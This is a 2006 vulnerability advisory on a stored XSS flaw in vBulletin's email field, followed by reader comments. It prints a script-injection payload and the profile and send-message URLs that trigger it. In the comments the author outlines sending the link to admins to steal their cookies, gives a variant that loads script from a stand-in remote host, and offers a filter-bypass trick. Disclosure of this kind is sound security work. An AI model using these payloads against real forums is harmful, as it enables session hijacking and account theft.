——–Summary——–
Software: vBulletin
Sowtware’s Web Site: http://www.vBulletin.com
Versions: 3.0.12-3.5.3
Class: Remote
Status: Unpatched
Exploit: Available
Solution: Available
Discovered by: imei addmimistrator
Risk Level: Mediume
——-Description——-
There is a security bug in most powerfull & common forum software vBulletin version 3.0.12&3.5.3 that allows attacker performe a XSS attack. bug is in result of unsentizing quotation and < & > characters for “email” field of users’ information. a weak regular expression for validation email that allows insertiong unvalid characters in domain-name section of email is source of this bug and also forgot to htmlspeacialcharing output value in sendmsg.php file, helps exploiting this bug. a successfull attack can result to thefthing cookies, hijacking pages and etc…
——-Conditions——-
AdminSetting Should meeted these settings:
Enable Email features=Yes
Allow Users to Email Other Members=Yes
Use Secure Email Sending=No
forum/admins/options.php?do=options&dogroup=email
It sounds that conditions are defaultly OK;
——-Exploit——-
Scenario:
/forum/profile.php?do=editpassword
pass:your pass
email: imei@myimei.com”><script>alert(1)</script>.nomatt
Note About lenght limitation 
****
forum/profile.php?do=editoptions
Receive Email from Other Members=yes
****
forum/sendmessage.php?do=mailmember&u={your id}
——-Solution——-
Upgrade to vendore provided patch.
——-Credit——-
Discovered by: imei addmimistrator
addmimistrator(4}gmail(O}com
www.myimei.com
myimei.com/security
19 Responses to “vBulletin3.0.12&3.5.3~is_valid_email()~XSS Attack”
Something to say?
You must be logged in to post a comment.
http://www.vbulletin.com/forum/showthread.php?t=176170
http://www.vbulletin.com/forum/showthread.php?t=176176
Left by imei on February 24th, 2006
baba inkaare!!!!!
Left by Folaani on March 8th, 2006
How we can do it?How we can hack a site by using this way
Left by OpTiMuS on March 12th, 2006
did your target forum has above mentioned conditions?
if yeah, enter exp text as your email and send a link of sendmsg.php to admins. you should alter that text to send his cookies to your script.
i am sorry about more detailes. we dont wana TEACH hack.
however there are many documents about XSS hacking.
regs
imei
Left by imei on March 12th, 2006
how can i close that bug??
reg
jeme
Left by jeme on March 12th, 2006
upgrade plz. vb provids a patch for this bug.(I concert with them and didnt public this vefor awaring vendor) 3.0.13 is patched for 3.0.12 and 3.5.4 is safe version of whom that have 3.5.3 version.
be beauty.
imei
Left by imei on March 13th, 2006
if you really can hack vBulletin Version 3.5.3 then ill give you money
just contact me and we will have a deal 
Left by Emad on April 27th, 2006
ِDear Emad.
It is a website for going to a SeQre world~ not a “How to hack” one. I dont need to show can i or can not i hack a vbulletin system. what that i need was what i got it! security sites, also vbulletin.com itself verified this bug and all things are ok!
btw if you’d like to learn XSS I can help you;)
Left by imei on April 27th, 2006
http://www.securityfocus.com/bid/16919
Left by imei on April 28th, 2006
More serious code than alert(1) cannot be typed due to length limitation (50). I even cannot call this bug “vulnerability”.
Left by Trasser on May 3rd, 2006
Exploiting a bug is another science in comparision with finding bug. security bugs have not need to have a clear exploit for calling them “vulnerability”.
btw i didnt want to spend more time for a patched and accepted bug but you as an interested person may like work on this one!
i{at}ii.ii”><script src=”aaa.aa/a.js”></script>.no
Left by imei on May 4th, 2006
“
Left by Trasser on May 17th, 2006
2IMEI: spaces are not allowed, this e-mail will be errorneous.
Left by Trasser on May 17th, 2006
i{at}ii.ii”><script”"src=”aaa.aa/a.js”></script>.no
What about this dear?
Left by imei on May 17th, 2006
Nothing. %20 not allowed, %a0 allowed but doesn’t work, ”” also allowed but doesn’t work.
Left by Trasser on May 18th, 2006
Work on it Trasser. there is some trix about XSS, i show you one of them. as a ultimate solution I offer you : Dont close <a tag that shows the mail link. after that you can inject events without space seperator;))
regs
Left by imei on May 20th, 2006
man,,thanx for this one,,can i know wer r u from ?
Left by JustMe on May 25th, 2006
Yes Sir. It is my About Me
http://myimei.com/security/about-me/
Left by imei on May 26th, 2006
can i have the best exploit plz ??
Left by SjK on May 27th, 2006